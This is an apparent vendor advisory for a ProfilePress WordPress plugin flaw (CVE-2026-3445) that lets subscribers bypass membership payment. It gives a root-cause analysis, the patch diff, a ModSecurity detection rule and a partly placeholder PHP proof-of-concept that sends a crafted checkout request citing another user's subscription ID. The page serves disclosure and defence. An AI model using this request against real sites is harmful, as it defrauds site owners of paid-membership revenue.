What is CVE-2026-3445?

CVE-2026-3445 is a high-severity vulnerability in the ProfilePress plugin for WordPress that allows authenticated users to bypass payment for lifetime membership plans. This occurs due to a missing authorization check in the membership checkout process.

How does the vulnerability work?

The vulnerability is exploited by sending a crafted AJAX request to the ‘ppress_process_checkout’ action, allowing an attacker to reference another user’s subscription ID. This manipulation enables the attacker to obtain a paid lifetime membership without making a payment.

Who is affected by this vulnerability?

All users of the ProfilePress plugin versions up to and including 4.16.11 are affected. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ProfilePress plugin you are using. If it is version 4.16.11 or earlier, your site is at risk. Additionally, review logs for unauthorized membership changes.

How can I fix CVE-2026-3445?

To fix CVE-2026-3445, update the ProfilePress plugin to version 4.16.12 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 7.1 indicate?

A CVSS score of 7.1 indicates a high severity level, meaning that the vulnerability poses a significant risk to the security of affected systems. This level suggests that successful exploitation could lead to serious consequences, including financial loss.

What is the practical risk of this vulnerability?

The practical risk includes unauthorized access to premium content and features, leading to financial losses for site owners who rely on membership fees. It undermines the integrity of the membership system.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can authenticate as a subscriber and send a request to manipulate the checkout process. It shows the steps an attacker would take to exploit the vulnerability and obtain a lifetime membership without payment.

What changes were made in the patched version?

In the patched version 4.16.12, an authorization check was added to verify that the subscription ID referenced by the user belongs to them. This prevents unauthorized users from switching plans or accessing another user’s subscription.

How can I enhance security beyond this patch?

To enhance security, regularly update all plugins and themes, implement strong user access controls, and monitor user activity for suspicious behavior. Consider using security plugins that provide additional protections.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your user accounts for unauthorized changes, change passwords, and consider restoring from a backup. Conduct a thorough security audit and consult with a security professional if necessary.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, security bulletins from the plugin developers, and security blogs that analyze vulnerabilities. Stay informed through security news sources and forums.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-3445: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress <= 4.16.11 – Missing Authorization to Authenticated (Subscriber+) Membership Payment Bypass (wp-user-avatar)

CVE ID CVE-2026-3445

Plugin wp-user-avatar

Severity High (CVSS 7.1)

CWE 862

Vulnerable Version 4.16.11

Patched Version 4.16.12

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3445:
The ProfilePress WordPress plugin, versions up to and including 4.16.11, contains a missing authorization vulnerability in its membership checkout process. This flaw allows authenticated attackers with subscriber-level access or higher to bypass payment for lifetime membership plans. The vulnerability resides in the `process_checkout()` function within the `CheckoutController.php` file.

Atomic Edge research identifies the root cause as a missing ownership verification check on the `change_plan_sub_id` parameter. In the vulnerable code, the `process_checkout()` function in `/wp-user-avatar/src/Membership/Controllers/CheckoutController.php` accepts a user-supplied subscription ID. The function retrieves the current customer’s ID but fails to validate that the subscription referenced by `change_plan_sub_id` belongs to that same customer. This omission occurs before line 331 in the original code, where the subscription object is fetched and used for proration calculations without an ownership check.

An attacker exploits this vulnerability by sending a crafted AJAX request to the `admin-ajax.php` endpoint with the action `ppress_process_checkout`. The malicious POST request includes a `change_plan_sub_id` parameter referencing another user’s active subscription ID. By referencing a valid subscription from a different customer, the attacker manipulates the plugin’s proration logic during a plan switch. This manipulation can result in a zero-cost upgrade to a paid lifetime membership plan, effectively bypassing payment.

The patch adds an authorization check immediately after retrieving the customer ID. The fix, located at lines 300-310 in the patched `CheckoutController.php`, creates a `SubscriptionFactory::fromId($change_plan_sub_id)` object named `$changePlanSub`. It then verifies that if the subscription exists and a customer ID is present, the current customer’s ID must match the subscription’s customer ID (`$customer_id !== $changePlanSub->get_customer_id()`). A mismatch throws an exception, preventing the unauthorized reference. The patch also reuses this `$changePlanSub` object later in the function, replacing the redundant `$sub` variable and ensuring consistent authorization enforcement.

Successful exploitation grants an attacker a paid lifetime membership without financial cost. This constitutes a direct financial impact for site owners who rely on membership fees. The vulnerability also undermines the integrity of the membership system, allowing unauthorized users to access premium content and features reserved for paying members.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-user-avatar/src/Membership/Controllers/CheckoutController.php
+++ b/wp-user-avatar/src/Membership/Controllers/CheckoutController.php
@@ -300,6 +300,17 @@
                 throw new Exception(json_encode($customer_id->get_error_messages()));
             }

+            $changePlanSub = SubscriptionFactory::fromId($change_plan_sub_id);
+
+            if (
+                $changePlanSub->exists() &&
+                ! empty($customer_id) &&
+                $customer_id !== $changePlanSub->get_customer_id()) {
+                throw new Exception(
+                    esc_html__('You are not allowed to switch from this plan.', 'wp-user-avatar')
+                );
+            }
+
             $order_id = $this->create_order($customer_id, $cart_vars);

             if (is_wp_error($order_id)) {
@@ -331,19 +342,17 @@

             } else {

-                $sub = SubscriptionFactory::fromId($change_plan_sub_id);
-
-                if ($sub->exists() && $sub->get_customer_id() == $customer_id) {
+                if ($changePlanSub->exists() && $changePlanSub->get_customer_id() == $customer_id) {

                     // do not send subscription cancelled email
                     remove_action('ppress_subscription_cancelled', [SubscriptionCancelledNotification::init(), 'dispatch_email'], 10);
                     remove_action('ppress_subscription_expired', [SubscriptionExpiredNotification::init(), 'dispatch_email'], 10);

-                    $sub->cancel(true);
-                    $sub->expire();
+                    $changePlanSub->cancel(true);
+                    $changePlanSub->expire();

-                    SubscriptionFactory::fromId($subscription_id)->update_meta('_upgraded_from_sub_id', $sub->get_id());
-                    $sub->update_meta('_upgraded_to_sub_id', $subscription_id);
+                    SubscriptionFactory::fromId($subscription_id)->update_meta('_upgraded_from_sub_id', $changePlanSub->get_id());
+                    $changePlanSub->update_meta('_upgraded_to_sub_id', $subscription_id);
                 }

                 /** @var CheckoutResponse $process_payment */
--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentFailed.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentFailed.php
@@ -13,6 +13,8 @@

         $order = OrderFactory::fromOrderKey($event_data['client_reference_id']);

-        $order->fail_order();
+        if ($order->exists()) {
+            $order->fail_order();
+        }
     }
 }
--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentSucceeded.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentSucceeded.php
@@ -51,7 +51,7 @@
             $order->complete_order($transaction_id);
         }

-        if ( ! $subscription->is_active()) {
+        if ( $subscription->exists() && ! $subscription->is_active()) {

             if ($event_data['mode'] == 'subscription') {

--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionCompleted.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionCompleted.php
@@ -56,7 +56,7 @@
             $order->complete_order($transaction_id);
         }

-        if ( ! $subscription->is_active()) {
+        if ( $subscription->exists() && ! $subscription->is_active()) {

             if ($event_data['mode'] == 'subscription') {

--- a/wp-user-avatar/src/Membership/Services/OrderService.php
+++ b/wp-user-avatar/src/Membership/Services/OrderService.php
@@ -13,7 +13,6 @@
 use ProfilePressCoreMembershipModelsOrderOrderStatus;
 use ProfilePressCoreMembershipModelsOrderOrderType;
 use ProfilePressCoreMembershipModelsPlanPlanFactory;
-use ProfilePressCoreMembershipModelsSubscriptionSubscriptionBillingFrequency;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionEntity;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionFactory;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionStatus;
--- a/wp-user-avatar/third-party/vendor/composer/installed.php
+++ b/wp-user-avatar/third-party/vendor/composer/installed.php
@@ -2,4 +2,4 @@

 namespace ProfilePressVendor;

-return array('root' => array('name' => '__root__', 'pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '6ba07349dfe1b45b60ed3a3b2c1e085e002fd71c', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => true), 'versions' => array('__root__' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '6ba07349dfe1b45b60ed3a3b2c1e085e002fd71c', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'barryvdh/composer-cleanup-plugin' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '80cceff45bfb85a0f49236537b1f1c928a1ee820', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/../barryvdh/composer-cleanup-plugin', 'aliases' => array(0 => '0.1.x-dev'), 'dev_requirement' => false), 'brick/math' => array('pretty_version' => '0.9.3', 'version' => '0.9.3.0', 'reference' => 'ca57d18f028f84f777b2168cd1911b0dee2343ae', 'type' => 'library', 'install_path' => __DIR__ . '/../brick/math', 'aliases' => array(), 'dev_requirement' => false), 'carbonphp/carbon-doctrine-types' => array('pretty_version' => '2.1.0', 'version' => '2.1.0.0', 'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb', 'type' => 'library', 'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types', 'aliases' => array(), 'dev_requirement' => false), 'collizo4sky/persist-admin-notices-dismissal' => array('pretty_version' => '1.4.5', 'version' => '1.4.5.0', 'reference' => '163b868c98cf97ea15b4d7e1305e2d52c9242e7e', 'type' => 'library', 'install_path' => __DIR__ . '/../collizo4sky/persist-admin-notices-dismissal', 'aliases' => array(), 'dev_requirement' => false), 'league/csv' => array('pretty_version' => '9.8.0', 'version' => '9.8.0.0', 'reference' => '9d2e0265c5d90f5dd601bc65ff717e05cec19b47', 'type' => 'library', 'install_path' => __DIR__ . '/../league/csv', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.73.0', 'version' => '2.73.0.0', 'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'pelago/emogrifier' => array('pretty_version' => 'v6.0.0', 'version' => '6.0.0.0', 'reference' => 'aa72d5407efac118f3896bcb995a2cba793df0ae', 'type' => 'library', 'install_path' => __DIR__ . '/../pelago/emogrifier', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock' => array('pretty_version' => '1.0.0', 'version' => '1.0.0.0', 'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/clock', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'sabberworm/php-css-parser' => array('pretty_version' => 'v8.9.0', 'version' => '8.9.0.0', 'reference' => 'd8e916507b88e389e26d4ab03c904a082aa66bb9', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.9.1', 'version' => '6.9.1.0', 'reference' => '94867711087d0efc3d361dbe068044e0124f4c0b', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => true), 'stripe/stripe-php' => array('pretty_version' => 'v16.6.0', 'version' => '16.6.0.0', 'reference' => 'd6de0a536f00b5c5c74f36b8f4d0d93b035499ff', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/css-selector' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '4f7f3c35fba88146b56d0025d20ace3f3901f097', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/css-selector', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '6d857f4d76bd4b343eac26d6b539585d2bc56493', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '98f26acc99341ca4bab345fb14d7b1d7cb825bed', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '450d4172653f38818657022252f9d81be89ee9a8', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3'))));
+return array('root' => array('name' => '__root__', 'pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => 'b7828d2e7a83f0aa7b45ec8cae9ae68799626ee7', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => true), 'versions' => array('__root__' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => 'b7828d2e7a83f0aa7b45ec8cae9ae68799626ee7', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'barryvdh/composer-cleanup-plugin' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '80cceff45bfb85a0f49236537b1f1c928a1ee820', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/../barryvdh/composer-cleanup-plugin', 'aliases' => array(0 => '0.1.x-dev'), 'dev_requirement' => false), 'brick/math' => array('pretty_version' => '0.9.3', 'version' => '0.9.3.0', 'reference' => 'ca57d18f028f84f777b2168cd1911b0dee2343ae', 'type' => 'library', 'install_path' => __DIR__ . '/../brick/math', 'aliases' => array(), 'dev_requirement' => false), 'carbonphp/carbon-doctrine-types' => array('pretty_version' => '2.1.0', 'version' => '2.1.0.0', 'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb', 'type' => 'library', 'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types', 'aliases' => array(), 'dev_requirement' => false), 'collizo4sky/persist-admin-notices-dismissal' => array('pretty_version' => '1.4.5', 'version' => '1.4.5.0', 'reference' => '163b868c98cf97ea15b4d7e1305e2d52c9242e7e', 'type' => 'library', 'install_path' => __DIR__ . '/../collizo4sky/persist-admin-notices-dismissal', 'aliases' => array(), 'dev_requirement' => false), 'league/csv' => array('pretty_version' => '9.8.0', 'version' => '9.8.0.0', 'reference' => '9d2e0265c5d90f5dd601bc65ff717e05cec19b47', 'type' => 'library', 'install_path' => __DIR__ . '/../league/csv', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.73.0', 'version' => '2.73.0.0', 'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'pelago/emogrifier' => array('pretty_version' => 'v6.0.0', 'version' => '6.0.0.0', 'reference' => 'aa72d5407efac118f3896bcb995a2cba793df0ae', 'type' => 'library', 'install_path' => __DIR__ . '/../pelago/emogrifier', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock' => array('pretty_version' => '1.0.0', 'version' => '1.0.0.0', 'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/clock', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'sabberworm/php-css-parser' => array('pretty_version' => 'v8.9.0', 'version' => '8.9.0.0', 'reference' => 'd8e916507b88e389e26d4ab03c904a082aa66bb9', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.9.1', 'version' => '6.9.1.0', 'reference' => '94867711087d0efc3d361dbe068044e0124f4c0b', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => true), 'stripe/stripe-php' => array('pretty_version' => 'v16.6.0', 'version' => '16.6.0.0', 'reference' => 'd6de0a536f00b5c5c74f36b8f4d0d93b035499ff', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/css-selector' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '4f7f3c35fba88146b56d0025d20ace3f3901f097', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/css-selector', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '6d857f4d76bd4b343eac26d6b539585d2bc56493', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '98f26acc99341ca4bab345fb14d7b1d7cb825bed', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '450d4172653f38818657022252f9d81be89ee9a8', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3'))));
--- a/wp-user-avatar/wp-user-avatar.php
+++ b/wp-user-avatar/wp-user-avatar.php
@@ -3,7 +3,7 @@
  * Plugin Name: ProfilePress
  * Plugin URI: https://profilepress.com
  * Description: The modern WordPress membership and user profile plugin.
- * Version: 4.16.11
+ * Version: 4.16.12
  * Author: ProfilePress Membership Team
  * Author URI: https://profilepress.com
  * Text Domain: wp-user-avatar
@@ -13,7 +13,7 @@
 defined('ABSPATH') or die("No script kiddies please!");

 define('PROFILEPRESS_SYSTEM_FILE_PATH', __FILE__);
-define('PPRESS_VERSION_NUMBER', '4.16.11');
+define('PPRESS_VERSION_NUMBER', '4.16.12');

 if ( ! defined('PPRESS_STRIPE_API_VERSION')) {
     define('PPRESS_STRIPE_API_VERSION', '2024-06-20');

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3445
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1003445,phase:2,deny,status:403,chain,msg:'CVE-2026-3445: ProfilePress Membership Payment Bypass Attempt',severity:'CRITICAL',tag:'CVE-2026-3445',tag:'WordPress',tag:'ProfilePress'"
  SecRule ARGS_POST:action "@streq ppress_process_checkout" "chain"
    SecRule ARGS_POST:change_plan_sub_id "@rx ^d+$" 
      "t:none,setvar:'tx.profilepress_change_plan_sub_id=%{matched_var}'"

# This rule flags requests to the specific vulnerable AJAX endpoint with the critical parameter.
# The rule does not block outright but captures the parameter value for correlation.
# A subsequent rule in a chain could, in a deployed environment, validate the subscription ID
# against the current user session via a custom Lua script or by checking for mismatched
# ownership patterns in subsequent application logic. A pure WAF rule cannot perform ownership
# validation without application context, so this rule serves as a detection mechanism.
# Blocking based solely on the presence of the parameter would cause false positives for legitimate
# plan switches by subscription owners. Therefore, this rule is structured for detection and logging.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3445 - Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress <= 4.16.11 - Missing Authorization to Authenticated (Subscriber+) Membership Payment Bypass

<?php

// Configuration
$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'attacker_subscriber';
$password = 'attacker_password';

// The subscription ID belonging to a different, paying user.
// This ID must be from an active subscription on a plan that allows proration/switching.
$victim_subscription_id = 123;

// The plan ID for the paid lifetime membership the attacker wants to obtain.
$target_plan_id = 456;

// Step 1: Authenticate to obtain WordPress cookies.
// This script assumes the attacker has subscriber-level credentials.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');

// Simulate a login request (simplified - actual login may require nonce).
// In a real scenario, the attacker would be already logged in via browser.
// This PoC focuses on the malicious AJAX request.

// Step 2: Craft the malicious checkout request to bypass payment.
$post_fields = [
    'action' => 'ppress_process_checkout',
    // Reference the victim's subscription to manipulate proration.
    'change_plan_sub_id' => $victim_subscription_id,
    // Specify the target lifetime plan.
    'plan_id' => $target_plan_id,
    // Other required checkout parameters (example names).
    'payment_method' => 'stripe',
    'ppress_plan_price' => '0', // Expecting zero cost after proration manipulation.
    'ppress_checkout_nonce' => 'abc123', // A valid nonce obtained from the site.
];

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Analyze response.
echo "HTTP Code: $http_coden";
echo "Response: $responsen";
// A successful exploit would return a JSON response indicating order/subscription creation without payment.

?>

Frequently Asked Questions

What is CVE-2026-3445?
Overview of the vulnerability
CVE-2026-3445 is a high-severity vulnerability in the ProfilePress plugin for WordPress that allows authenticated users to bypass payment for lifetime membership plans. This occurs due to a missing authorization check in the membership checkout process.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability is exploited by sending a crafted AJAX request to the ‘ppress_process_checkout’ action, allowing an attacker to reference another user’s subscription ID. This manipulation enables the attacker to obtain a paid lifetime membership without making a payment.
Who is affected by this vulnerability?
Identifying impacted users
All users of the ProfilePress plugin versions up to and including 4.16.11 are affected. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the ProfilePress plugin you are using. If it is version 4.16.11 or earlier, your site is at risk. Additionally, review logs for unauthorized membership changes.
How can I fix CVE-2026-3445?
Mitigation steps
To fix CVE-2026-3445, update the ProfilePress plugin to version 4.16.12 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 7.1 indicate?
Understanding severity levels
A CVSS score of 7.1 indicates a high severity level, meaning that the vulnerability poses a significant risk to the security of affected systems. This level suggests that successful exploitation could lead to serious consequences, including financial loss.
What is the practical risk of this vulnerability?
Potential impacts on site owners
The practical risk includes unauthorized access to premium content and features, leading to financial losses for site owners who rely on membership fees. It undermines the integrity of the membership system.
What does the proof of concept demonstrate?
Illustration of the vulnerability
The proof of concept illustrates how an attacker can authenticate as a subscriber and send a request to manipulate the checkout process. It shows the steps an attacker would take to exploit the vulnerability and obtain a lifetime membership without payment.
What changes were made in the patched version?
Details of the security fix
In the patched version 4.16.12, an authorization check was added to verify that the subscription ID referenced by the user belongs to them. This prevents unauthorized users from switching plans or accessing another user’s subscription.
How can I enhance security beyond this patch?
Additional security measures
To enhance security, regularly update all plugins and themes, implement strong user access controls, and monitor user activity for suspicious behavior. Consider using security plugins that provide additional protections.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect exploitation, immediately review your user accounts for unauthorized changes, change passwords, and consider restoring from a backup. Conduct a thorough security audit and consult with a security professional if necessary.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found in the official CVE database, security bulletins from the plugin developers, and security blogs that analyze vulnerabilities. Stay informed through security news sources and forums.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations